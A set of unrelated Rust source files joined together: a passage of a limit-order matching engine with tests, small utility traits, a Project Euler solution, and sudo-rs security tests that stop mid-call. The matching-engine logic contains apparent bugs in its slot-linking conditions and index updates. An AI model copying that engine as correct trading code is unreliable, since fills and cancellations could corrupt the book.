if node.qty.is_zero() || !node.qty.is_sign_positive() {
remove_node_key = node.price;
}
let mut order_slot: usize;
loop {
if taker.remain_qty.is_zero() {
break;
}
order_slot = node.order_slot;
if order_slot == 0 {
break;
}
assert_eq!(self.orders[order_slot].logic.used, true);
if self.orders[order_slot].remain_qty > taker.remain_qty {
self.orders[order_slot].trade(taker);
break;
} else {
self.orders[order_slot].logic.used = false;
self.order_bitmap.clear(&order_slot);
self.orders[order_slot].trade(taker);
let next = self.orders[order_slot].logic.next_slot;
if next != 0 || order_slot == next {
node.order_slot = next;
self.orders[next].logic.pre_slot = 0;
} else {
break;
}
}
}
}
None => {
if !taker.remain_qty.is_zero()
&& taker.remain_qty.is_sign_positive()
{
self.insert_order(taker);
}
return;
}
}
} //}}}
match self.bid_price_index.last_key_value() {
Some((_, price_node)) => self.bid_leader = *price_node,
None => self.bid_leader = PriceNode::default(),
}
}
} //}}}
OrderSide::Bid => {
//{{{
if self.ask_leader.qty.is_zero()
|| self.ask_leader.price.is_zero()
|| self.ask_leader.price > taker.price
{
self.insert_order(taker);
return;
}
self.ask_leader.qty -= taker.remain_qty;
if !self.ask_leader.qty.is_zero() && self.ask_leader.qty.is_sign_positive() {
// After match . ask leader still remain qty
let mut maker_slot: usize;
loop {
if taker.remain_qty.is_zero() {
break;
}
maker_slot = self.ask_leader.order_slot;
if self.orders[maker_slot].remain_qty > taker.remain_qty {
self.orders[maker_slot].trade(taker);
break;
} else {
self.orders[maker_slot].trade(taker);
self.order_bitmap.clear(&maker_slot);
let next = self.orders[maker_slot].logic.next_slot;
assert!(next != 0);
self.ask_leader.order_slot = next;
self.orders[next].logic.pre_slot = 0;
}
}
self.ask_price_index
.insert(self.bid_leader.price, self.bid_leader.clone());
} else {
let mut remove_node_key: Decimal = dec!(0);
loop {
if !remove_node_key.is_zero() {
self.ask_price_index.remove(&remove_node_key);
}
if taker.remain_qty.is_zero() {
break;
}
match self.ask_price_index.first_entry() {
Some(mut entry) => {
let price = *entry.key();
let node = entry.get_mut();
if price > taker.price {
//{{{
if taker.remain_qty.is_sign_positive() {
self.insert_order(taker);
break;
}
} //}}}
node.qty -= taker.remain_qty;
if node.qty.is_zero() || !node.qty.is_sign_positive() {
remove_node_key = node.price;
}
let mut order_slot: usize;
loop {
if taker.remain_qty.is_zero() {
break;
}
order_slot = node.order_slot;
if order_slot == 0 {
break;
}
assert_eq!(self.orders[order_slot].logic.used, true);
if self.orders[order_slot].remain_qty > taker.remain_qty {
self.orders[order_slot].trade(taker);
} else {
self.orders[order_slot].logic.used = false;
self.order_bitmap.clear(&order_slot);
self.orders[order_slot].trade(taker);
let next = self.orders[order_slot].logic.next_slot;
if next != 0 || next == order_slot {
node.order_slot = next;
self.orders[next].logic.pre_slot = 0;
} else {
break;
}
}
}
}
None => {
if !taker.remain_qty.is_zero()
&& taker.remain_qty.is_sign_positive()
{
self.insert_order(taker);
}
}
}
}
}
}
} //}}}
} //}}}
/// market price match
/// When the order is market type they will not be write into the order book.
/// If there are remainning parts after the order is matched. match engine will reject this parts and gennerate a trade reocrd for this parts
fn market_match(&mut self, taker: &mut OrderInfo) {
assert_eq!(taker.op, OrderOp::Market);
match taker.side {
OrderSide::Ask => {
//{{{
if self.bid_leader.qty.is_zero() || self.bid_leader.price.is_zero() {
// gen new reject trade_record
// TODO:
return;
}
self.bid_leader.qty -= taker.remain_qty;
if !self.bid_leader.qty.is_zero() || self.bid_leader.qty.is_sign_positive() {
let mut maker_slot: usize;
loop {
if taker.remain_qty.is_zero() {
break;
}
maker_slot = self.bid_leader.order_slot;
if self.orders[maker_slot].remain_qty > taker.remain_qty {
self.orders[maker_slot].trade(taker);
break;
} else {
self.order_bitmap.clear(&maker_slot);
let next = self.orders[maker_slot].logic.next_slot;
self.bid_leader.order_slot = next;
self.orders[next].logic.pre_slot = 0;
}
}
// update the price node in the index
self.bid_price_index
.insert(self.bid_leader.price, self.bid_leader.clone());
} else {
let mut remove_node_key = dec!(0);
loop {
if !remove_node_key.is_zero() {
self.bid_price_index.remove(&remove_node_key);
remove_node_key = dec!(0);
}
if taker.remain_qty.is_zero() {
break;
}
match self.bid_price_index.last_entry() {
Some(mut entry) => {
let price = *entry.key();
let node = entry.get_mut();
node.qty -= taker.remain_qty;
if node.qty.is_zero() || !node.qty.is_sign_positive() {
remove_node_key = price;
}
let mut maker_slot: usize;
loop {
if taker.remain_qty.is_zero() {
break;
}
maker_slot = node.order_slot;
if maker_slot == 0 {
break;
}
assert_eq!(self.orders[maker_slot].logic.used, true);
if self.orders[maker_slot].remain_qty > taker.remain_qty {
self.orders[maker_slot].trade(taker);
break;
} else {
self.orders[maker_slot].logic.used = true;
self.order_bitmap.clear(&maker_slot);
self.orders[maker_slot].trade(taker);
let next = self.orders[maker_slot].logic.next_slot;
if next != 0 || maker_slot == next {
node.order_slot = next;
self.orders[next].logic.pre_slot = 0;
} else {
break;
}
}
}
match self.bid_price_index.last_key_value() {
Some((_, price_node)) => self.bid_leader = *price_node,
None => self.bid_leader = PriceNode::default(),
}
}
None => {
if !taker.remain_qty.is_zero() {
// TODO:
// reject taker remain qty
}
}
}
}
}
} //}}}
OrderSide::Bid => {
//{{{
if self.ask_leader.qty.is_zero() || self.ask_leader.price.is_zero() {
// TODO: reject this market order. because there is no suitable ask order.
return;
}
self.ask_leader.qty = taker.remain_qty / self.ask_leader.price;
if !self.ask_leader.qty.is_zero() && self.ask_leader.qty.is_sign_positive() {
let mut maker_slot: usize;
loop {
if taker.remain_qty.is_zero() {
break;
}
maker_slot = self.ask_leader.order_slot;
if self.orders[maker_slot].remain_qty
> taker.remain_qty / self.ask_leader.price
{
self.orders[maker_slot].trade(taker);
break;
} else {
self.orders[maker_slot].trade(taker);
self.order_bitmap.clear(&maker_slot);
let next = self.orders[maker_slot].logic.next_slot;
assert!(next != 0);
self.ask_leader.order_slot = next;
self.orders[next].logic.pre_slot = 0;
}
}
self.ask_price_index
.insert(self.bid_leader.price, self.bid_leader.clone());
} else {
let mut remove_node_key: Decimal = dec!(0);
loop {
if !remove_node_key.is_zero() {
self.ask_price_index.remove(&remove_node_key);
}
if taker.remain_qty.is_zero() {
break;
}
match self.ask_price_index.first_entry() {
Some(mut entry) => {
let price = *entry.key();
let price_node = entry.get_mut();
price_node.qty -= taker.remain_qty / price;
if price_node.qty.is_zero() || !price_node.qty.is_sign_positive() {
remove_node_key = price;
}
let mut maker_slot: usize;
loop {
if taker.remain_qty.is_zero() {
break;
}
maker_slot = price_node.order_slot;
if maker_slot == 0 {
break;
}
assert_eq!(self.orders[maker_slot].logic.used, true);
if self.orders[maker_slot].remain_qty > taker.remain_qty / price
{
self.orders[maker_slot].trade(taker);
} else {
self.orders[maker_slot].logic.used = false;
self.order_bitmap.clear(&maker_slot);
self.orders[maker_slot].trade(taker);
let next = self.orders[maker_slot].logic.next_slot;
if next != 0 || next == maker_slot {
price_node.order_slot = next;
self.orders[next].logic.pre_slot = 0;
} else {
break;
}
}
}
}
None => {
if !taker.remain_qty.is_zero() {
// TODO: reject remain part
return;
}
}
}
}
}
} //}}}
}
}
    // cancel order
    // Removes the order matching `order.id` at `order.price` from its side of
    // the book, unlinking it from the price level's intrusive slot list and
    // refreshing the cached leader when the whole level disappears. Returns the
    // stored order only for middle/tail removals; head removals, whole-level
    // removals, and misses return None (the original keeps that asymmetry).
    fn cancel(&mut self, order: &mut OrderInfo) -> Option<OrderInfo> {
        //{{{
        assert!(order.op == OrderOp::Cancel);
        match order.side {
            OrderSide::Ask => match self.ask_price_index.get_mut(&order.price) {
                //{{{
                Some(mut price_node) => {
                    let mut order_slot = price_node.order_slot;
                    loop {
                        // slot 0 terminates the intrusive list
                        if order_slot == 0 {
                            return None;
                        }
                        if self.orders[order_slot].id == order.id {
                            self.order_bitmap.clear(&order_slot);
                            self.orders[order_slot].logic.used = false;
                            // fix the price node
                            // NOTE: `order` below shadows the parameter with a
                            // copy of the stored order being removed.
                            let order = self.orders[order_slot];
                            price_node.qty -= order.remain_qty;
                            // order.logic.used = false;
                            if order.logic.pre_slot == 0 && order.logic.next_slot == 0 {
                                // remove this price node
                                self.ask_price_index.remove(&order.price);
                                if self.ask_leader.price == order.price {
                                    // update ask leader info
                                    match self.ask_price_index.first_key_value() {
                                        Some((_, price_node)) => {
                                            self.ask_leader = *price_node;
                                        }
                                        None => {
                                            self.ask_leader = PriceNode::default();
                                        }
                                    }
                                }
                                return None;
                            }
                            if order.logic.pre_slot == 0 {
                                // head of the list: promote the next slot
                                let next_slot = order.logic.next_slot;
                                price_node.order_slot = next_slot;
                                self.orders[next_slot].logic.pre_slot = 0usize;
                                return None;
                            }
                            // middle/tail: stitch prev and next slots together
                            self.orders[order.logic.pre_slot].logic.next_slot =
                                order.logic.next_slot;
                            if order.logic.next_slot != 0 {
                                self.orders[order.logic.next_slot].logic.pre_slot =
                                    order.logic.pre_slot;
                            }
                            return Some(self.orders[order_slot].clone());
                        }
                        order_slot = self.orders[order_slot].logic.next_slot;
                    }
                }
                None => {
                    return None;
                }
            }, //}}}
            OrderSide::Bid => match self.bid_price_index.get_mut(&order.price) {
                //{{{
                Some(mut price_node) => {
                    //{{{
                    let mut order_slot = price_node.order_slot;
                    loop {
                        if order_slot == 0 {
                            return None;
                        }
                        if self.orders[order_slot].id == order.id {
                            self.order_bitmap.clear(&order_slot);
                            self.orders[order_slot].logic.used = false;
                            // fix the price node
                            let order = self.orders[order_slot];
                            price_node.qty -= order.remain_qty;
                            // order.logic.used = false;
                            if order.logic.pre_slot == 0 && order.logic.next_slot == 0 {
                                // remove this price node
                                self.bid_price_index.remove(&order.price);
                                // update bid leader price node
                                if self.bid_leader.price == order.price {
                                    match self.bid_price_index.last_key_value() {
                                        Some((_, price_node)) => {
                                            self.bid_leader = *price_node;
                                        }
                                        None => {
                                            self.bid_leader = PriceNode::default();
                                        }
                                    }
                                }
                                return None;
                            }
                            if order.logic.pre_slot == 0 {
                                // head of the list: promote the next slot
                                let next_slot = order.logic.next_slot;
                                price_node.order_slot = next_slot;
                                self.orders[next_slot].logic.pre_slot = 0usize;
                                return None;
                            }
                            // middle/tail: stitch prev and next slots together
                            self.orders[order.logic.pre_slot].logic.next_slot =
                                order.logic.next_slot;
                            if order.logic.next_slot != 0 {
                                self.orders[order.logic.next_slot].logic.pre_slot =
                                    order.logic.pre_slot;
                            }
                            return Some(self.orders[order_slot].clone());
                        }
                        order_slot = self.orders[order_slot].logic.next_slot;
                    }
                } //}}}
                None => {
                    return None;
                }
            }, //}}}
        }
    } //}}}
    // There is no suitable price order, Insert this order into orderbook
    // Allocates a free slot from the bitmap, appends the order to the tail of
    // its price level's intrusive list (creating the level if needed) and keeps
    // the side's cached leader node in sync.
    fn insert_order(&mut self, order: &mut OrderInfo) {
        //{{{
        assert!(order.op == OrderOp::Limit);
        let slot = self.order_bitmap.find_unset();
        let price = order.price;
        match order.side {
            OrderSide::Ask => {
                //{{{
                match self.ask_price_index.get_mut(&price) {
                    Some(mut price_node) => {
                        // price node already exist
                        price_node.qty += order.remain_qty;
                        let last_slot = price_node.last_slot;
                        order.logic.curr_slot = slot;
                        order.logic.pre_slot = last_slot;
                        order.logic.next_slot = 0usize;
                        order.logic.used = true;
                        self.orders[last_slot].logic.next_slot = slot;
                        price_node.last_slot = slot;
                        // keep the cached leader copy in sync with its level
                        if self.ask_leader.price == order.price {
                            self.ask_leader.last_slot = slot;
                            self.ask_leader.qty += order.remain_qty;
                        }
                    }
                    None => {
                        // price node does not exist
                        let new_node = PriceNode {
                            qty: order.remain_qty,
                            price: order.price,
                            order_slot: slot,
                            last_slot: slot,
                        };
                        order.logic.curr_slot = slot;
                        order.logic.pre_slot = 0usize;
                        order.logic.next_slot = 0usize;
                        order.logic.used = true;
                        // a lower ask (or an empty side) becomes the new leader
                        if self.ask_leader.price > order.price || self.ask_leader.price.is_zero() {
                            self.ask_leader.price = order.price;
                            self.ask_leader.qty = order.remain_qty;
                            self.ask_leader.order_slot = slot;
                            self.ask_leader.last_slot = slot;
                        }
                        self.ask_price_index.insert(order.price, new_node);
                    }
                }
            } //}}}
            OrderSide::Bid => {
                //{{{
                match self.bid_price_index.get_mut(&price) {
                    Some(mut price_node) => {
                        // price node already exist
                        price_node.qty += order.remain_qty;
                        let last_slot = price_node.last_slot;
                        order.logic.curr_slot = slot;
                        order.logic.pre_slot = last_slot;
                        order.logic.next_slot = 0usize;
                        order.logic.used = true;
                        self.orders[last_slot].logic.next_slot = slot;
                        price_node.last_slot = slot;
                        if order.price == self.bid_leader.price {
                            self.bid_leader.qty += order.remain_qty;
                            self.bid_leader.last_slot = slot;
                        }
                    }
                    None => {
                        // price node does not exist
                        let new_node = PriceNode {
                            qty: order.remain_qty,
                            price: order.price,
                            order_slot: slot,
                            last_slot: slot,
                        };
                        order.logic.curr_slot = slot;
                        order.logic.pre_slot = 0usize;
                        order.logic.next_slot = 0usize;
                        order.logic.used = true;
                        // a higher bid becomes the new leader
                        if self.bid_leader.price < order.price {
                            self.bid_leader.price = order.price;
                            self.bid_leader.qty = order.remain_qty;
                            self.bid_leader.order_slot = slot;
                            self.bid_leader.last_slot = slot;
                        }
                        self.bid_price_index.insert(order.price, new_node);
                    }
                }
            } //}}}
        }
        // persist the (now linked) order into its slab slot
        self.orders[slot] = *order;
    } //}}}
    /// Serializes the whole book to JSON and writes it to
    /// `batch/<UTC date>_<market>.d`, fsync-ing the descriptor so the dump
    /// survives a crash.
    ///
    /// NOTE(review): panics (`unwrap`) on serialization or I/O failure —
    /// acceptable only if snapshotting is allowed to abort the process.
    fn snapshot(&self) {
        //{{{
        let json = serde_json::to_string(self).unwrap();
        // e.g. "2024-01-31_BTC_USDT.d"; NOTE(review): a market name containing
        // '/' would produce a nested path — confirm markets are sanitized.
        let dump_file_name = Utc::now().format("%Y-%m-%d_").to_string() + &self.market + ".d";
        println!("{}", dump_file_name);
        let mut file = File::create("batch/".to_owned() + &dump_file_name).unwrap();
        file.write_all(json.as_bytes()).unwrap();
        // SAFETY: the raw fd is valid for the lifetime of `file`, which
        // outlives this call. Presumably libc's fsync — TODO confirm import.
        unsafe {
            fsync(file.as_raw_fd());
        }
    } //}}}
}
#[cfg(test)]
mod tests {
    use super::*;
    #[test]
    fn order_book_init_insert_test() {
        //{{{
        let mut orderbook = OrderBook::new(100, "BTC/USDT".to_owned());
        let mut test_order = OrderInfo::default();
        test_order.price = dec!(1.2);
        test_order.id = 1;
        test_order.raw_qty = dec!(100);
        test_order.remain_qty = dec!(100);
        orderbook.insert_order(&mut test_order);
        assert_eq!(orderbook.bid_leader.qty, dec!(100));
        test_order.id = 2;
        orderbook.insert_order(&mut test_order);
        assert_eq!(orderbook.bid_leader.qty, dec!(200));
        test_order.id = 3;
        orderbook.insert_order(&mut test_order);
        assert_eq!(orderbook.bid_leader.qty, dec!(300));
        // Same-price orders are chained through slots: 1 <-> 2 <-> 3.
        assert_eq!(orderbook.orders[1].logic.curr_slot, 1);
        assert_eq!(orderbook.orders[1].logic.pre_slot, 0);
        assert_eq!(orderbook.orders[1].logic.next_slot, 2);
        assert_eq!(orderbook.orders[2].logic.curr_slot, 2);
        assert_eq!(orderbook.orders[2].logic.pre_slot, 1);
        assert_eq!(orderbook.orders[2].logic.next_slot, 3);
        assert_eq!(orderbook.orders[3].logic.curr_slot, 3);
        assert_eq!(orderbook.orders[3].logic.pre_slot, 2);
        assert_eq!(orderbook.orders[3].logic.next_slot, 0);
        for (k, v) in orderbook.bid_price_index.iter() {
            println!("{}-> {:?}", k, v);
        }
        let price_node = orderbook.bid_price_index.get(&test_order.price).unwrap();
        println!("{:?}", price_node);
    } //}}}
    #[test]
    fn order_book_cancel_test() {
        //{{{
        let mut orderbook = OrderBook::new(100, "BTC/USDT".to_owned());
        let mut test_order = OrderInfo::default();
        test_order.id = 1;
        test_order.price = dec!(1.23);
        test_order.raw_qty = dec!(100);
        test_order.remain_qty = dec!(100);
        orderbook.insert_order(&mut test_order);
        test_order.id = 2;
        orderbook.insert_order(&mut test_order);
        test_order.id = 3;
        orderbook.insert_order(&mut test_order);
        // Cancel the middle order of the three resting bids.
        test_order.id = 2;
        test_order.op = OrderOp::Cancel;
        orderbook.cancel(&mut test_order);
        let price_node = orderbook.bid_price_index.get(&test_order.price).unwrap();
        assert_eq!(price_node.qty, dec!(200));
        assert_eq!(price_node.order_slot, 1usize);
        assert_eq!(price_node.last_slot, 3usize);
        assert_eq!(orderbook.orders[2].logic.used, false);
        // Exercise the ask side: the freed slot 2 is recycled for order id 4.
        test_order.op = OrderOp::Limit;
        test_order.side = OrderSide::Ask;
        test_order.id = 4;
        test_order.price = dec!(1.25);
        orderbook.insert_order(&mut test_order);
        test_order.id = 5;
        orderbook.insert_order(&mut test_order);
        test_order.id = 6;
        orderbook.insert_order(&mut test_order);
        test_order.id = 5;
        test_order.op = OrderOp::Cancel;
        orderbook.cancel(&mut test_order);
        assert_eq!(orderbook.orders[2].logic.curr_slot, 2);
        assert_eq!(orderbook.orders[2].logic.pre_slot, 0);
        assert_eq!(orderbook.orders[2].logic.next_slot, 5);
        assert_eq!(orderbook.orders[4].logic.curr_slot, 4);
        assert_eq!(orderbook.orders[4].logic.pre_slot, 2);
        assert_eq!(orderbook.orders[4].logic.next_slot, 5);
        assert_eq!(orderbook.orders[5].logic.curr_slot, 5);
        assert_eq!(orderbook.orders[5].logic.pre_slot, 2);
        assert_eq!(orderbook.orders[5].logic.next_slot, 0);
        let price_node = orderbook.ask_price_index.get(&test_order.price).unwrap();
        assert_eq!(price_node.qty, dec!(200));
        assert_eq!(price_node.order_slot, 2);
        assert_eq!(price_node.last_slot, 5);
    } //}}}
    #[test]
    // Renamed from `order_bool_...`: "bool" was a typo for "book".
    fn order_book_limit_match_test_bid_taker() {
        //{{{
        let mut orderbook = OrderBook::new(100, "BTC/USDT".to_owned());
        let mut test_order = OrderInfo::default();
        test_order.id = 1;
        test_order.price = dec!(1.23);
        test_order.raw_qty = dec!(100);
        test_order.remain_qty = dec!(100);
        test_order.uid = 10001;
        orderbook.insert_order(&mut test_order.clone());
        let node = orderbook.bid_price_index.get(&dec!(1.23)).unwrap();
        assert_eq!(node.qty, dec!(100));
        assert_eq!(node.price, dec!(1.23));
        assert_eq!(node.order_slot, 1usize);
        assert_eq!(node.last_slot, 1usize);
        test_order.price = dec!(1.24);
        test_order.uid = 10002;
        test_order.id = 2;
        orderbook.insert_order(&mut test_order.clone());
        let node = orderbook.bid_price_index.get(&dec!(1.24)).unwrap();
        assert_eq!(node.qty, dec!(100));
        assert_eq!(node.price, dec!(1.24));
        assert_eq!(node.order_slot, 2usize);
        assert_eq!(node.last_slot, 2usize);
        test_order.price = dec!(1.25);
        test_order.uid = 10003;
        test_order.id = 3;
        orderbook.insert_order(&mut test_order.clone());
        let node = orderbook.bid_price_index.get(&dec!(1.25)).unwrap();
        assert_eq!(node.qty, dec!(100));
        assert_eq!(node.price, dec!(1.25));
        assert_eq!(node.order_slot, 3usize);
        assert_eq!(node.last_slot, 3usize);
        // Ask taker for 250 at 1.23: fully fills the bids at 1.25 and 1.24,
        // partially fills the bid at 1.23 (50 remains).
        test_order.price = dec!(1.23);
        test_order.raw_qty = dec!(250);
        test_order.remain_qty = dec!(250);
        test_order.uid = 10005;
        test_order.side = OrderSide::Ask;
        orderbook.match_entry(&mut test_order.clone());
        assert!(orderbook.bid_price_index.get(&dec!(1.25)).is_none());
        assert!(orderbook.bid_price_index.get(&dec!(1.24)).is_none());
        let node = orderbook.bid_price_index.get(&dec!(1.23)).unwrap();
        assert_eq!(node.qty, dec!(50));
        assert_eq!(node.price, dec!(1.23));
        assert_eq!(node.order_slot, 1usize);
        assert_eq!(node.last_slot, 1usize);
        assert_eq!(orderbook.orders[1].logic.used, true);
        assert_eq!(orderbook.orders[2].logic.used, false);
        assert_eq!(orderbook.orders[3].logic.used, false);
    } //}}}
    #[test]
    // Renamed from `order_bool_...` ("bool" -> "book") and FIXED: the
    // post-match assertions previously probed `bid_price_index`, which is
    // always empty here — the resting orders are asks, so the removed levels
    // must be checked in `ask_price_index`.
    fn order_book_limit_match_test_ask_taker() {
        //{{{
        let mut orderbook = OrderBook::new(100, "BTC/USDT".to_owned());
        let mut test_order = OrderInfo::default();
        test_order.side = OrderSide::Ask;
        test_order.id = 1;
        test_order.price = dec!(1.23);
        test_order.raw_qty = dec!(100);
        test_order.remain_qty = dec!(100);
        test_order.uid = 10001;
        orderbook.insert_order(&mut test_order.clone());
        let node = orderbook.ask_price_index.get(&dec!(1.23)).unwrap();
        assert_eq!(node.qty, dec!(100));
        assert_eq!(node.price, dec!(1.23));
        assert_eq!(node.order_slot, 1usize);
        assert_eq!(node.last_slot, 1usize);
        test_order.price = dec!(1.24);
        test_order.uid = 10002;
        test_order.id = 2;
        orderbook.insert_order(&mut test_order.clone());
        let node = orderbook.ask_price_index.get(&dec!(1.24)).unwrap();
        assert_eq!(node.qty, dec!(100));
        assert_eq!(node.price, dec!(1.24));
        assert_eq!(node.order_slot, 2usize);
        assert_eq!(node.last_slot, 2usize);
        test_order.price = dec!(1.25);
        test_order.uid = 10003;
        test_order.id = 3;
        orderbook.insert_order(&mut test_order.clone());
        let node = orderbook.ask_price_index.get(&dec!(1.25)).unwrap();
        assert_eq!(node.qty, dec!(100));
        assert_eq!(node.price, dec!(1.25));
        assert_eq!(node.order_slot, 3usize);
        assert_eq!(node.last_slot, 3usize);
        // Bid taker for 250 at 1.25: fully fills the asks at 1.23 and 1.24,
        // partially fills the ask at 1.25 (50 remains).
        test_order.price = dec!(1.25);
        test_order.raw_qty = dec!(250);
        test_order.remain_qty = dec!(250);
        test_order.uid = 10005;
        test_order.side = OrderSide::Bid;
        orderbook.match_entry(&mut test_order.clone());
        assert!(orderbook.ask_price_index.get(&dec!(1.24)).is_none());
        assert!(orderbook.ask_price_index.get(&dec!(1.23)).is_none());
        let node = orderbook.ask_price_index.get(&dec!(1.25)).unwrap();
        assert_eq!(node.qty, dec!(50));
        assert_eq!(node.price, dec!(1.25));
        assert_eq!(node.order_slot, 3usize);
        assert_eq!(node.last_slot, 3usize);
        assert_eq!(orderbook.orders[1].logic.used, false);
        assert_eq!(orderbook.orders[2].logic.used, false);
        assert_eq!(orderbook.orders[3].logic.used, true);
    } //}}}
    #[test]
    fn snapshot_test() {
        // Writes a dump file under "batch/"; that directory must exist.
        let mut orderbook = OrderBook::new(2, "BTC_USDT".to_owned());
        let mut test_order = OrderInfo::default();
        test_order.id = 1;
        test_order.price = dec!(1.23);
        test_order.raw_qty = dec!(100);
        test_order.remain_qty = dec!(100);
        test_order.uid = 10001;
        orderbook.insert_order(&mut test_order.clone());
        orderbook.snapshot();
    }
}
fn main() {}
|
/// Fallibly borrow a `T` out of `Self`.
pub trait AsRefOpt<T> {
    /// Returns `Some(&T)` when a value of that type is available, else `None`.
    fn as_ref_opt(&self) -> Option<&T>;
}
/// Mirror of [`AsRefOpt`]: fallibly borrow `Self` out of a `U`.
pub trait FromRefOpt<U> {
    /// Returns `Some(&Self)` when `u` can provide one, else `None`.
    fn from_ref_opt(u: &U) -> Option<&Self>;
}
/// Blanket implementation: any `U: AsRefOpt<T>` automatically makes
/// `T: FromRefOpt<U>`, analogous to the std `From`/`Into` pairing.
impl<T, U> FromRefOpt<U> for T
where
    U: AsRefOpt<T>,
{
    fn from_ref_opt(u: &U) -> Option<&Self> {
        u.as_ref_opt()
    }
}
|
use std::io::prelude::*;
use std::fs::File;
use std::io::{BufReader, Error};
use std::cmp;
/// Reads the Project Euler #18 triangle from `../data/problem_018_input.txt`.
/// Each line of the file holds one whitespace-separated row of numbers.
///
/// The deprecated `try!` macro has been replaced by the `?` operator.
/// NOTE: the function name keeps its historical typo ("traingle") so
/// existing callers remain source-compatible.
///
/// # Errors
/// Returns any I/O error raised while opening or reading the file.
///
/// # Panics
/// Panics if a token in the file is not a valid `u32`.
pub fn read_traingle() -> Result<Vec<Vec<u32>>, Error> {
    let f = File::open("../data/problem_018_input.txt")?;
    let reader = BufReader::new(f);
    let mut nums = vec![];
    for line in reader.lines() {
        let line = line?;
        let row: Vec<u32> = line.split_whitespace().map(|d| d.parse::<u32>().unwrap()).collect();
        nums.push(row);
    }
    Ok(nums)
}
/// Computes the maximum top-to-bottom path sum through `triangle`
/// (each step may move to the adjacent-left or adjacent-right child).
///
/// Dynamic programming: `max_sum[i][j]` holds the best sum of any path
/// ending at row `i`, position `j`. Runs in O(cells) time.
///
/// Fixes over the previous version: the needless `row.clone()` per row is
/// removed, and an empty triangle now returns 0 instead of panicking.
pub fn max_path(triangle: Vec<Vec<u32>>) -> u32 {
    let mut max_sum: Vec<Vec<u32>> = vec![];
    for (index, row) in triangle.iter().enumerate() {
        if index == 0 {
            max_sum.push(row.to_owned());
        } else {
            let mut row_max = Vec::with_capacity(row.len());
            for (pos, &value) in row.iter().enumerate() {
                // Best predecessor from the upper-left (absent at the left edge)...
                let left = if pos == 0 { 0 } else { max_sum[index - 1][pos - 1] };
                // ...and from the upper-right (absent at the right edge).
                let right = if pos == index { 0 } else { max_sum[index - 1][pos] };
                row_max.push(value + cmp::max(left, right));
            }
            max_sum.push(row_max);
        }
    }
    // Empty triangle (or empty last row) yields 0.
    max_sum.last().map_or(0, |row| row.iter().max().copied().unwrap_or(0))
}
/// Solves Project Euler problem 18: reads the input triangle from disk and
/// returns its maximum path sum.
///
/// # Panics
/// Panics if the input file cannot be read (see `read_traingle`).
pub fn problem_018() -> u32 {
    let triangle = read_traingle().unwrap();
    max_path(triangle)
}
#[cfg(test)]
mod test {
    use super::*;
    // `test::Bencher` requires a nightly toolchain with `#![feature(test)]`.
    use test::Bencher;
    #[test]
    fn test_problem_018() {
        let ans: u32 = problem_018();
        println!("Answer to Problem 18: {}", ans);
        // Known answer for the official problem-18 input triangle.
        assert!(ans == 1074)
    }
    #[bench]
    fn bench_problem_018(b: &mut Bencher) {
        b.iter(|| problem_018());
    }
}
|
/// A snapshot of a single OS process as shown in the UI.
///
/// Field and method names keep their original camelCase spelling so
/// external callers remain source-compatible.
pub struct Process {
    cmdName: &'static str,
    state: &'static str,
    pid: &'static str,
    mem: f64,
    time: &'static str,
    user: &'static str,
}
impl Process {
    /// Builds a `Process` record from its individual columns.
    pub fn new(
        name: &'static str,
        state: &'static str,
        pid: &'static str,
        mem: f64,
        time: &'static str,
        user: &'static str,
    ) -> Process {
        Process {
            cmdName: name,
            state,
            pid,
            mem,
            time,
            user,
        }
    }
    /// Renders the record as pid, user, time, memory and command name,
    /// concatenated without separators (the `state` column is not rendered).
    pub fn toString(&self) -> String {
        format!(
            "{}{}{}{}{}",
            self.pid, self.user, self.time, self.mem, self.cmdName
        )
    }
}
|
use sudo_test::{Command, Env};
use crate::{Result, PANIC_EXIT_CODE, SUDOERS_ALL_ALL_NOPASSWD, USERNAME};
// Snapshot-testing helper: routes all snapshots from this file to
// `../snapshots/misc` and drops the module prefix from snapshot names,
// then delegates to `insta::assert_snapshot!`.
macro_rules! assert_snapshot {
    ($($tt:tt)*) => {
        insta::with_settings!({
            prepend_module_to_snapshot => false,
            snapshot_path => "../snapshots/misc",
        }, {
            insta::assert_snapshot!($($tt)*)
        });
    };
}
// A caller whose uid has no passwd-database entry must be rejected with a
// clear error and exit code 1, even under a NOPASSWD-for-everyone policy.
#[test]
fn user_not_in_passwd_database_cannot_use_sudo() -> Result<()> {
    let env = Env(SUDOERS_ALL_ALL_NOPASSWD).build()?;
    // uid 1000 is never registered as a user in this environment.
    let output = Command::new("sudo")
        .arg("true")
        .as_user_id(1000)
        .output(&env)?;
    assert!(!output.status().success());
    assert_eq!(Some(1), output.status().code());
    let stderr = output.stderr();
    if sudo_test::is_original_sudo() {
        // Original sudo's exact wording is pinned by an insta snapshot.
        assert_snapshot!(stderr);
    } else {
        assert_contains!(stderr, "user 'current user' not found");
    }
    Ok(())
}
// sudo must not leak file descriptors inherited from its invoker: a script
// run through sudo that tries to read the parent's fd 42 must fail with
// "Bad file descriptor". Parameterized over `use_pty` so both I/O setups
// are covered.
fn closes_open_file_descriptors(tty: bool) -> Result<()> {
    let script_path = "/tmp/script.bash";
    // Force the use_pty default on or off to select the code path.
    let defaults = if tty {
        "Defaults use_pty"
    } else {
        "Defaults !use_pty"
    };
    let env = Env([SUDOERS_ALL_ALL_NOPASSWD, defaults])
        .file(
            script_path,
            include_str!("misc/read-parents-open-file-descriptor.bash"),
        )
        .build()?;
    let output = Command::new("bash")
        .arg(script_path)
        .tty(tty)
        .output(&env)?;
    // The script is expected to fail because the fd was closed by sudo.
    assert!(!output.status().success());
    assert_eq!(Some(1), output.status().code());
    assert_contains!(
        if tty {
            // Docker merges stderr into stdout with "--tty". See gh622
            output.stdout_unchecked()
        } else {
            output.stderr()
        },
        "42: Bad file descriptor"
    );
    Ok(())
}
// PTY variant of the shared `closes_open_file_descriptors` scenario.
#[test]
fn closes_open_file_descriptors_with_tty() -> Result<()> {
    closes_open_file_descriptors(true)
}
// Non-PTY variant of the shared `closes_open_file_descriptors` scenario.
#[test]
fn closes_open_file_descriptors_without_tty() -> Result<()> {
    closes_open_file_descriptors(false)
}
// Without the setuid bit sudo cannot elevate, so it must refuse to run and
// explain how the binary should be installed.
#[test]
fn sudo_binary_lacks_setuid_flag() -> Result<()> {
    let env = Env(SUDOERS_ALL_ALL_NOPASSWD).user(USERNAME).build()?;
    // Strip the setuid bit (normally 4755) from the installed binary.
    Command::new("chmod")
        .args(["0755", "/usr/bin/sudo"])
        .output(&env)?
        .assert_success()?;
    let output = Command::new("sudo")
        .arg("true")
        .as_user(USERNAME)
        .output(&env)?;
    assert!(!output.status().success());
    assert_eq!(Some(1), output.status().code());
    assert_contains!(
        output.stderr(),
